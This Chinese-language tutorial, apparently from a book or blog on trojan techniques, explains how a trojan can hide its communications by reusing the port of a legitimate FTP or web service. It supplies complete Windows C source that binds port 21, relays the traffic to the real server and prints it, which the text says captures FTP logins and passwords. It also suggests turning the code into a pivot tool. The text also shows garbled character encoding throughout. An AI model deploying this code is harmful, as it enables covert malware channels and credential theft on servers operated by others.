木馬的服務(wù)端與客戶端通信必將產(chǎn)生活動(dòng)端口,，產(chǎn)生活動(dòng)端口就很容易被發(fā)現(xiàn),，那么應(yīng)該如何隱藏端口呢,？

　　1. 端口復(fù)用的原理

　　端口復(fù)用就是某個(gè)已經(jīng)被其他服務(wù)綁定過(guò)的端口再次被綁定而進(jìn)行重復(fù)使用,。端口復(fù)用對(duì)于木馬程序來(lái)說(shuō)有兩個(gè)好處,。第一個(gè)好處是隱藏端口,，比如某臺(tái)主機(jī)上搭建了FTP服務(wù)器,，這樣默認(rèn)情況下就開(kāi)啟了21號(hào)端口,，通過(guò)端口復(fù)用就可以直接使用21號(hào)端口完成木馬的通信,，在進(jìn)行檢測(cè)時(shí)就不會(huì)發(fā)現(xiàn)有多余的端口被打開(kāi),；第二個(gè)好處是不會(huì)被防火墻阻攔，因?yàn)槎丝趶?fù)用FTP服務(wù)端口或Web服務(wù)端口這些已知和合法的端口,，這些端口在服務(wù)器上是正常使用的端口,，那么管理員當(dāng)然會(huì)允許這些正常服務(wù)的通信連接。

　　木馬使用端口復(fù)用技術(shù)后,，由于木馬和被復(fù)用服務(wù)使用同一個(gè)端口（比如木馬復(fù)用了FTP的21號(hào)端口）,，當(dāng)數(shù)據(jù)包到達(dá)時(shí)，系統(tǒng)根據(jù)指定IP地址較詳細(xì)的原則就傳遞給誰(shuí),。指定IP地址時(shí)的代碼如下：

　　sockaddr_in saddr;

　　saddr.sin_addr.S_un.S_addr = INADDR_ANY;

　　在代碼中對(duì)地址的賦值使用了INADDR_ANY,，表示任意的本機(jī)IP地址都可以。這樣指定的地址不是最明確的,。通常提供服務(wù)的Web服務(wù)器或FTP服務(wù)器都有類(lèi)似的設(shè)置,。那么在編寫(xiě)使用端口復(fù)用技術(shù)的木馬時(shí)，就要明確指定用戶所使用的一個(gè)IP地址,。無(wú)論用戶是擁有內(nèi)網(wǎng)的IP地址,，還是有外網(wǎng)的IP地址，都擁有一個(gè)回環(huán)地址,，即127.0.0.1,。在設(shè)置重復(fù)綁定的端口時(shí)，可以設(shè)置為除127.0.0.1之外的任意具體IP地址,。比如,，可以設(shè)定一個(gè)“10.10.30.77”IP地址。而127.0.0.1這個(gè)回環(huán)地址是木馬與提供服務(wù)的服務(wù)器軟件進(jìn)行通信的,。示意圖如圖1所示,。

　　圖1  端口服務(wù)用木馬通信示意圖

　　從圖1中可以看出，無(wú)論是防火墻外部還是防火墻內(nèi)容,，木馬都是可以正常通信的,。復(fù)用了FTP服務(wù)器端口的木馬會(huì)收到所有發(fā)給FTP服務(wù)器的數(shù)據(jù),，那么木馬在中間充當(dāng)一個(gè)數(shù)據(jù)中轉(zhuǎn)的作用，把原本發(fā)給FTP服務(wù)器的數(shù)據(jù)還是轉(zhuǎn)發(fā)給FTP服務(wù)器,。如何區(qū)分是發(fā)給FTP服務(wù)器的數(shù)據(jù),，還是發(fā)給木馬的數(shù)據(jù)？凡是發(fā)給木馬的數(shù)據(jù)都是有固定的數(shù)據(jù)頭部的,，以此可以判斷哪些數(shù)據(jù)轉(zhuǎn)發(fā),、哪些數(shù)據(jù)自己進(jìn)行處理。由于木馬所處的通信位置,，很容易截取到發(fā)送給FTP服務(wù)器的數(shù)據(jù),，也很容易篡改FTP服務(wù)器發(fā)送給客戶端的數(shù)據(jù)。這點(diǎn)是很可怕,、很危險(xiǎn)的,。同樣，如果復(fù)用的是Web服務(wù)器的端口,，那么就可以在不修改Web頁(yè)面的情況下,，直接發(fā)送給瀏覽器一些惡意代碼，從而對(duì)用戶進(jìn)行攻擊,。

　　2. 端口復(fù)用的代碼實(shí)現(xiàn)

　　下面來(lái)看源代碼的實(shí)現(xiàn),。

　　#include <stdio.h>

　　#include <winsock2.h>

　　#pragma comment （lib, “ws2_32”）

　　DWORD WINAPI ClientThread（LPVOID lpParam）；

　　int main（）

　　{

　　WSADATA wsa;

　　SOCKET s;

　　BOOL bVal;

　　SOCKET sc;

　　int nAddrSize;

　　sockaddr_in ClientAddr;

　　// 初始化 SOCK 庫(kù)

　　WSAStartup（MAKEWORD（2, 2）,， &wsa）,；

　　// 建立套接字

　　s = socket（PF_INET, SOCK_STREAM, IPPROTO_TCP）；

　　bVal = TRUE;

　　// 設(shè)置套接字為復(fù)用模式

　　if （ setsockopt（s, SOL_SOCKET, SO_REUSEADDR, （char *）&bVal, sizeof（bVal）） != 0 ）

　　{

　　printf（“error! \r\n”）,；

　　return -1;

　　}

　　sockaddr_in sListen;

　　sListen.sin_family = AF_INET;

　　// 這里的 IP 地址必須明確指定一個(gè)地址

　　sListen.sin_addr.S_un.S_addr = inet_addr（“192.168.1.102”）,；

　　sListen.sin_port = htons（21）,；

　　// 綁定 21 號(hào)端口

　　if （ bind（s, （SOCKADDR*）&sListen, sizeof（SOCKADDR）） == SOCKET_ERROR ）

　　{

　　printf（“%d\r\n”, GetLastError（））,；

　　printf（“error bind! \r\n”）；

　　return -1;

　　}

　　// 監(jiān)聽(tīng)套接字

　　listen（s, 1）,；

　　// 循環(huán)接受來(lái)自 FTP 客戶端或木馬的請(qǐng)求

　　while （ TRUE ）

　　{

　　HANDLE hThread;

　　nAddrSize = sizeof（SOCKADDR）,；

　　// 接受請(qǐng)求

　　sc = accept（s, （SOCKADDR*）&ClientAddr, &nAddrSize）；

　　if （ sc != INVALID_SOCKET ）

　　{

　　// 創(chuàng)建新線程進(jìn)行處理

　　hThread = CreateThread（NULL, 0, ClientThread, （LPVOID）sc, 0, NULL）,；

　　CloseHandle（hThread）,；

　　}

　　}

　　closesocket（s）；

　　WSACleanup（）,；

　　return 0;

　　}

　　DWORD WINAPI ClientThread（LPVOID lpParam）

　　{

　　// 保存與 FTP 客戶端通信的 SOCKET

　　SOCKET sc = （SOCKET）lpParam;

　　// 建立與 FTP 服務(wù)器端通信的 SOCKET

　　SOCKET sFtp;

　　sockaddr_in saddr;

　　DWORD dwTimeOut;

　　DWORD dwNum;

　　BYTE bBuffer[0x1000] = { 0 };

　　sFtp = socket（PF_INET, SOCK_STREAM, IPPROTO_TCP）,；

　　saddr.sin_family = AF_INET;

　　saddr.sin_addr.S_un.S_addr = inet_addr（“127.0.0.1”）；

　　saddr.sin_port = htons（21）,；

　　// 設(shè)置超時(shí)

　　dwTimeOut = 100;

　　setsockopt（sc, SOL_SOCKET, SO_RCVTIMEO,

　?。╟har *）&dwTimeOut, sizeof（dwTimeOut））,；

　　setsockopt（sFtp, SOL_SOCKET, SO_RCVTIMEO,

　　（char *）&dwTimeOut, sizeof（dwTimeOut））,；

　　// 連接 FTP 服務(wù)器

　　connect（sFtp, （SOCKADDR*）&saddr, sizeof（SOCKADDR））,；

　　// 循環(huán)接受客戶端與服務(wù)器的通信數(shù)據(jù)

　　while （ TRUE ）

　　{

　　// 接收客戶端的數(shù)據(jù)

　　dwNum = recv（sc, （char *）bBuffer, 0x1000, 0）；

　　if （ dwNum > 0 && dwNum != SOCKET_ERROR ）

　　{

　　bBuffer[dwNum] = '\0';

　　printf（“%s \r\n”, bBuffer）,；

　　// 轉(zhuǎn)發(fā)給 FTP 服務(wù)器端

　　send（sFtp, （char *）bBuffer, dwNum, 0）,；

　　}

　　else if （ dwNum == 0 ）

　　{

　　break;

　　}

　　ZeroMemory（bBuffer, 0x1000）；

　　// 接收 FTP 服務(wù)器端的數(shù)據(jù)

　　dwNum = recv（sFtp, （char *）bBuffer, 0x1000, 0）,；

　　if （ dwNum > 0 && dwNum != SOCKET_ERROR ）

　　{

　　bBuffer[dwNum] = '\0';

　　printf（“%s \r\n”, bBuffer）,；

　　// 轉(zhuǎn)發(fā)給客戶端

　　send（sc, （char *）bBuffer, dwNum, 0）；

　　}

　　else if （ dwNum == 0 ）

　　{

　　break;

　　}

　　ZeroMemory（bBuffer, 0x1000）,；

　　}

　　closesocket（sc）,；

　　closesocket（sFtp）；

　　return 0;

　　}

　　這里的代碼中只是實(shí)現(xiàn)了一個(gè)端口復(fù)用的轉(zhuǎn)發(fā)功能,，并沒(méi)有提供木馬的相應(yīng)功能,。如果加入木馬的功能，就要在木馬收到數(shù)據(jù)后先判斷是控制端發(fā)送的木馬命令,，還是應(yīng)該轉(zhuǎn)發(fā)的數(shù)據(jù),，從而進(jìn)行相應(yīng)的處理。木馬在轉(zhuǎn)發(fā)數(shù)據(jù)的過(guò)程中獲取了FTP數(shù)據(jù),，如圖2所示,。

　　圖2  木馬轉(zhuǎn)發(fā)數(shù)據(jù)

　　編譯連接自己的代碼，然后先啟動(dòng)FTP服務(wù)器,，再啟動(dòng)連接好的木馬,，通過(guò)命令行下連接FTP服務(wù)器。在木馬轉(zhuǎn)發(fā)的過(guò)程中得到了登錄FTP服務(wù)器的賬號(hào)和密碼（FTP對(duì)于賬號(hào)和密碼的傳輸都是明文進(jìn)行的）,。以此來(lái)看,，木馬在轉(zhuǎn)發(fā)數(shù)據(jù)包的過(guò)程中也成了針對(duì)某服務(wù)的嗅探工具。

　　如法炮制,，通過(guò)簡(jiǎn)單修改上面的代碼則可以改成一個(gè)跳板程序,。具體實(shí)現(xiàn)方式與此類(lèi)似，就不再進(jìn)行闡述,。作為延展性的內(nèi)容,，請(qǐng)大家自行完成。